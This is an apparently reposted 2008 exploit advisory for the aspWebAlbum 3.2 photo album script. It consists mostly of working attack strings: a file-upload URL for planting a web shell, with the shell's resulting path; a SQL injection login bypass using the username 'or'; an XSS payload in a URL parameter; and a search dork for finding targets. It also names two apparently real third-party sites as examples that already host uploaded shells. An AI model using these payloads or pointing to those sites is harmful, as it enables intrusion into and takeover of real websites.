aspWebAlbum 3.2 Multiple Remote Vulnerabilities

🗓️ 11 Sep 2008 00:00:00Reported by RootType
aspWebAlbum 3.2 Multiple Remote Vulnerabilities found, including Arbitrary File Upload and Admin Bypass

                                                #################################################################################################
                                                                                                #
#-#  Discovered by Alemin_Krali                                                                 #
                                                                                                #
#-#  aspWebAlbum 3.2                                                                            #
                                                                                                #
#-#  Script Download &quot;http://www.fullrevolution.com&quot;                                            #
                                                                                                #
#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )                                         #
                                                                                                #
#-#  HomePage  al3m.blogspot.com                                                                #
                                                                                                #
#-#  [email protected]                                                                     #
                                                                                                #
#-#  Dork ? : album.asp?pic= .jpg cat=                                                          #
                                                                                                #
                                                                                                #
                                                                                                #
            #--#  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]                    #
                                                                                                #
http://www.site.com/path/album.asp?action=uploadmedia&amp;cat=Real Category Name!                   #
                                                                                                #
and your shell adress:                                                                          #
                                                                                                #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                #
                                                                                                #
                                                                                                #
ex:1                                                                                            #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp          #
                                                                                                #
ex:2                                                                                            #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                #
Ablaze rally 9-24-06/pics/klasvayv.asp                                                          #
                                                                                                #
                                                                                                #
           #--#  2-Admin Bypass     [AspWebAlbum 3.2]                                           #
                                                                                                #
                                                                                                #
http://site.com/path/album.asp?action=login                                                     #
                                                                                                #
ASP/MS SQL Server login syntax                                                                  #
                                                                                                #
Username:'or'                                                                                   #
Password:anything                                                                               #
                                                                                                #
                                                                                                #
           #--# 3-Xss Vulnerability  [AspWebAlbum 3.2]                                          #
                                                                                                #
http://site.com/album/album.asp?action=summary&amp;message=&lt;script&gt;alert('xss')&lt;/script&gt;&amp;from=login #
                                                                                                #
##################################################################################################
11 Sep 2008 00:00Current
7.1High risk
Vulners AI Score7.1